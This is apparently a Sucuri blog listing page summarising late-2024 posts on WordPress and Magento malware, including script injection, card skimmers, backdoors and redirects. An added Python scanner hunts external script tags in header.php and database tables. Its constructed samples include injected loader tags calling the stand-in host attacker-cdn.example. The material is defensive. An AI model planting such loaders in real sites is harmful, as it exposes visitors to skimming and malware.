Sucuri Blog: Learn about website security, software vulnerabilities, how to protect WordPress, and malware infections from our team of security researchers.
- Vulnerability & Patch Roundup — November 2024 by Sucuri Malware Research Team on December 20, 2024 at 9:09 pm
Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes of website compromises. To help educate website owners about potential threats to their environments, we've compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this past month. The vulnerabilities listed below are virtually patched by the Sucuri Firewall, and existing clients are protected.
- Malicious Script Injection on WordPress Sites by Puja Srivastava on December 5, 2024 at 9:48 pm
Recently, our team discovered JavaScript-based malware affecting WordPress sites, primarily those using the Hello Elementor theme. Malware of this kind is commonly embedded in legitimate-looking website files so that it loads scripts from an external source. This sample injects a malicious external script into the theme's header.php file, with harmful consequences for site owners and visitors. Domains involved: spadeanalytica[.]com, uph-analytics[.
- Credit Card Skimmer Malware Targeting Magento Checkout Pages by Puja Srivastava on November 27, 2024 at 12:21 am
Magento websites are a frequent target for cybercriminals because of their widespread use in eCommerce and the valuable customer data they handle. During a routine investigation, we discovered a malicious JavaScript injection targeting Magento websites. Depending on the variant, the malware either dynamically creates a fake credit card form or reads the real payment fields directly, and it activates only on checkout pages. The stolen data is then encrypted and exfiltrated to a remote server. Overview of the infection: initially discovered by Weston Henry, a colleague on our team, the malware is designed to target Magento-powered eCommerce websites, specifically their checkout processes.
- Simple Include Statement Hides Casino Spam by Kayleigh Martin on November 14, 2024 at 10:35 pm
Just as there are countless types of websites on the internet, there are just as many attackers seeking to exploit them. These attackers develop malicious code that continuously evolves, constantly finding new ways to harm their next target. Some threat actors rely on heavy obfuscation to conceal their malicious code, while others use stealthier methods to disguise malware that sits in plain sight. We recently stumbled upon a WordPress infection in which the victim's website was hosting a spam doorway with casino and slot links based out of Indonesia.
- PHP Reinfector and Backdoor Malware Target WordPress Sites by Puja Srivastava on November 13, 2024 at 9:55 pm
We recently observed a surge in WordPress websites infected by a sophisticated PHP reinfector and backdoor malware. While we initially believed the infection was linked to the wpcode plugin, we found that several sites without this plugin were compromised as well. On deeper investigation, we discovered that this malware not only reinfects website files but also embeds malicious code in other plugins and in the wp_posts and wp_options database tables. One backdoor we uncovered showed how attackers maintain unauthorized access to these sites and spread the infection further.
- Malware Steals Account Credentials by Matt Morrow on November 8, 2024 at 9:22 pm
It's common for malware to target e-commerce sites, and these attackers are usually after credit card details. In most cases they insert scripts that read the checkout forms and siphon off fields such as the cardholder name, card number and expiration date. Once they have that information their job is done, and they use the data for other nefarious purposes (usually selling it on the black market). Every now and then, however, we encounter a case where the attackers are also after the credentials of customer accounts created on the site, along with the admin account credentials.
- 2024 Credit Card Theft Season Arrives by Ben Martin on November 7, 2024 at 8:12 pm
The holiday shopping season is just around the corner, and it's the time of year when eCommerce website owners need to be most on their guard. Credit card stealing malware, commonly referred to as "MageCart", is most rampant during the holiday shopping season. Attackers are always aiming to maximize their profits, and they know that if they focus their time and effort on the last quarter of the year, they'll have more stolen card details to sell on the dark web when the time comes to cash in on their ill-gotten gains.
- WordPress Vulnerability & Patch Roundup October 2024 by Sucuri Malware Research Team on November 1, 2024 at 7:12 pm
Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes of website compromises. To help educate website owners about potential threats to their environments, we've compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this past month. The vulnerabilities listed below are virtually patched by the Sucuri Firewall, and existing clients are protected.
- Rogue Ads Redirect Visitors by Matt Morrow on October 31, 2024 at 10:10 pm
Ads are everywhere. They generate revenue for site owners and can present content related to the website being visited. As detailed in previous articles, bad actors often take advantage of that functionality. Quite often rogue ad networks are used to pull down malicious content, but recently we've seen a campaign in which the threat actors use popular services like GitHub and Bitbucket to host their rogue ad sources. The injection: WordPress and other CMSs often rely on plugins that insert header content directly from the admin panel, making it easy for developers and non-developers alike to add functionality to their sites.
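The three injection points described in the posts above share one hunting signature: a script tag whose src points at a host the site does not normally load from, whether it sits in the theme's header.php (the Hello Elementor injection), in rows of wp_posts or wp_options (the PHP reinfector), or in header content that a header-insertion plugin stores in the database and prints on every page (the rogue ad sources). The following Python is an added example, not code from any of the Sucuri posts or from a Sucuri tool. The allowlist, the attacker-cdn.example host (a stand-in for the defanged spadeanalytica[.]com indicator), the header.php sample and the in-memory wp_options/wp_posts rows are all constructed; the two SQL queries use the real WordPress table and column names.

```python
import re
import sqlite3
from urllib.parse import urlparse

# Hosts this site is expected to load scripts from (assumption: set per site).
ALLOWED_HOSTS = {"www.example.com", "example.com"}

# <script ... src="..."> with any src value. The lazy [^>]*? keeps the match
# inside one tag; the src value ends at a quote, a space or the closing '>'.
SCRIPT_SRC_RE = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*['\"]?([^'\" >]+)", re.IGNORECASE)


def external_script_hosts(content, allowed_hosts=ALLOWED_HOSTS):
    """Return (src, host) for each <script src> loading from a host not on the allowlist.

    Relative paths (/wp-includes/...) are served by the site itself and are skipped;
    protocol-relative '//host/path' sources, a form injected loaders favour, are kept.
    """
    findings = []
    for src in SCRIPT_SRC_RE.findall(content):
        if src.startswith("//"):
            url = "https:" + src
        elif "://" in src:
            url = src
        else:
            continue
        host = (urlparse(url).hostname or "").lower()
        if host and host not in allowed_hosts:
            findings.append((src, host))
    return findings


# Constructed sample of a theme header.php with one legitimate and one injected loader.
# 'attacker-cdn.example' stands in for the defanged domain named in the post.
SAMPLE_HEADER_PHP = """<?php // theme header (constructed sample) ?>
<!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<meta charset="<?php bloginfo('charset'); ?>">
<?php wp_head(); ?>
<script src="https://www.example.com/js/theme.js"></script>
<script src="//attacker-cdn.example/analytics.js"></script>
</head>
"""

# Hunting queries for the two tables the reinfector post names. The same SQL runs
# on MySQL/MariaDB; LIKE is case-insensitive for ASCII in SQLite and under the
# usual MySQL collations.
INJECTION_QUERIES = {
    "wp_options": "SELECT option_id, option_name, option_value "
                  "FROM wp_options WHERE option_value LIKE '%<script%'",
    "wp_posts": "SELECT ID, post_title, post_content "
                "FROM wp_posts WHERE post_content LIKE '%<script%'",
}


def scan_wp_tables(conn, allowed_hosts=ALLOWED_HOSTS):
    """Run the queries and flag rows whose script tags load from a non-allowlisted host."""
    hits = []
    for table, query in INJECTION_QUERIES.items():
        for row_id, label, blob in conn.execute(query):
            for _src, host in external_script_hosts(blob, allowed_hosts):
                hits.append((table, row_id, label, host))
    return hits


def build_sample_db():
    """Constructed in-memory stand-in for wp_options/wp_posts (not a real site dump)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_options (option_id INTEGER, option_name TEXT, option_value TEXT);
        CREATE TABLE wp_posts (ID INTEGER, post_title TEXT, post_content TEXT);
    """)
    conn.executemany("INSERT INTO wp_options VALUES (?, ?, ?)", [
        (1, "siteurl", "https://www.example.com"),
        # header content stored by a header-insertion plugin, with an injected loader
        (2, "widget_custom_html",
         '<p>Opening hours</p><script src="https://attacker-cdn.example/l.js"></script>'),
    ])
    conn.executemany("INSERT INTO wp_posts VALUES (?, ?, ?)", [
        (10, "Hello world", "<p>Welcome to WordPress.</p>"),
        (11, "About", '<p>About us</p><script src="/wp-includes/js/local.js"></script>'),
        (12, "Contact", '<script type="text/javascript" src="//attacker-cdn.example/c.js"></script>'),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    for src, host in external_script_hosts(SAMPLE_HEADER_PHP):
        print(f"header.php loads an external script from {host}: {src}")
    for table, row_id, label, host in scan_wp_tables(build_sample_db()):
        print(f"{table} row {row_id} ({label}) loads a script from {host}")
```

Against a live site, feed the real header.php (and the other theme and plugin files) to external_script_hosts, and give scan_wp_tables a connection that exposes execute() the way sqlite3 does (for MySQL, pass a cursor instead). The LIKE filter only catches a literal script tag: the reinfector post notes that the malware also writes code into plugins, and a payload that is stored base64-encoded or assembled with document.createElement will not match, so a clean result narrows the search rather than clearing the site.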
- Indonesian Gambling Redirect Hiding in Plain Sight by Kayleigh Martin on October 30, 2024 at 11:51 pm
Many pieces of malware found over the years have been complex and difficult to find. Attackers often obfuscate their code to make it harder to track, and some samples require extensive review to uncover. But that is not always the case. Threat actors find new ways to inject malware and avoid detection, and in some situations they hide their malicious code in plain sight. Recently, I discovered a cleverly disguised malicious redirect in which the attackers leveraged a popular redirect plugin on a WordPress site.
- Fake “Fix It” Pop-Ups Target WordPress Sites via Malicious Plugin to Download Trojan by Puja Srivastava on October 18, 2024 at 6:45 pm
In our recent investigation, we discovered a new malware campaign targeting WordPress sites through a fake plugin, universal-popup-plugin-v133, which delivers deceptive browser "fix" pop-ups. The malware uses social engineering to trick visitors into downloading malicious files that compromise their systems. Type of website impacted and scope of infection: we reported a similar fake browser update in a recent June article. The current version of this malware affects WordPress sites, and we saw a similar case in August 2024 which SiteCheck now detects as malware.fake_update.7.